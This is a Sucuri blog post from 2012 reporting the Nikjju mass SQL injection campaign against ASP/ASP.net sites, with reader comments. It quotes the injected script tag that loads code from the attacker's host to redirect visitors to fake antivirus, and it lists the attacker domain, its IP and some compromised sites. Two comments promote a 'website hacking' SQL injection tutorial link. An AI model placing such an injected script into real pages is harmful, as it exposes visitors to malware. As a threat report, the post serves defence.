• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Nikjju Mass injection campaign (180k+ pages compromised)

April 17, 2012Daniel Cid

0
SHARES
FacebookTwitterSubscribe

Our research team have been tracking a new mass SQL injection campaign that started early this month. So far more than 180,000 URLs have been compromised. We will keep posting updates as we get them.


Nikjju is a mass SQL injection campaign targeting ASP/ASP.net sites (very similar to lizamoon from last year). When successful, it adds the following javascript to the compromised sites:

<script src= http://nikjju.com/r.php ></script>


This is used to redirect anyone visiting the infected websites to Fake/Rogue AVs (best-antiviruu.de.lv – mostly targeting Windows users). All the sites we analysed so far are Windows-based servers running ASP/ASP.net compromised via SQL injection.

Google

So far Google has identified 188,000 pages infected with that javascript call, but the number is growing really fast. It was less than 130,000 yesterday afternoon.

Another interesting thing is that if you move up the Google results pages, you’ll get “Page 4 of about 457,000 results (0.21 seconds)”. It is likely that the number is even higher than our estimated 180k pages.

Nikjju.com

The domain Nikjju.com (31.210.100.242) was registered April 1st and we started to see the first batch of compromised sites a few days after (April 4th).

Updated Date: 01-apr-2012
Creation Date: 01-apr-2012

To Webmasters

If your suspect your site has been compromised, you can verify it on Sucuri SiteCheck (free scanner).

You will also need to audit your code to make sure that any user input is sanitized before use.

.Govs

We are seeing a few small .gov sites compromised as well (mostly from China):

jnd.xmchengdu.gov.cn
study.dyny.gov.cn
www.cnll.gov.cn
www.bj.hzjcy.gov.cn
www.mirpurkhas.gov.pk
www.tdnyw.gov.cn
gcjs.kaifeng.gov.cn

More details to follow..

0
SHARES
FacebookTwitterSubscribe

Categories: Website Malware InfectionsTags: Hacked Websites, Malware Updates, Server Security

About Daniel Cid

Daniel B. Cid is currently the VP of Engineering at GoDaddy, as well as Founder & CTO of Sucuri and the open source project, OSSEC HIDS. His interests range from intrusion detection, log analysis (log-based intrusion detection), web-based malware research, and secure development. You can find more about Daniel on his site dcid.me or on Twitter: @danielcid

Reader Interactions

Comments

  1. prestoniscrazy

    April 17, 2012

    Can I search my data base for: “http:// nikjju. com/r.php” and it will come up?

    • Juuso

      April 17, 2012

      No, you would already know if your site would be compromised, since then it would redirect itself to some spam site.

      I don’t believe that they would add such rogue links into databases, since it would not have any outer effect to the site.

      • Imcarthi

        April 23, 2012

         did you find that virus

  2. Jorge Cordova

    April 19, 2012

    Interesting, but most attacks are in Asia and Europe.

  3. song jia

    May 7, 2012

    This is very educational content and written well for a change. It’s nice to see some people still understand how to produce a quality post!  http://www.cheapbeatsearphones.com/

  4. Michelle Ruse

    July 19, 2012

    So, this looks like an XSS attack stored via an SQL injection vulnerability. I wonder why it’s not called a mass XSS attack? 

  5. Vishwas Soni

    September 27, 2012

    For sql-Injection step by step tutorial…..
    http://freaktrickz.wordpress.com/2012/09/27/sql-injection-tutorial-website-hacking/

  6. Vishwas Soni

    October 29, 2012

    Just check it out the article on sql-injection-tutorial-website-hacking
    http://freaktrickz.wordpress.com/2012/09/27/sql-injection-tutorial-website-hacking/

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Sucuri website security

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2019 Sucuri Inc. All rights reserved

We use tools, such as cookies, to enable essential services and functionality on our site and to collect data on how visitors interact with our site, products and services. By clicking Continue, you agree to our use of these tools for advertising, analytics and support.Continue Read More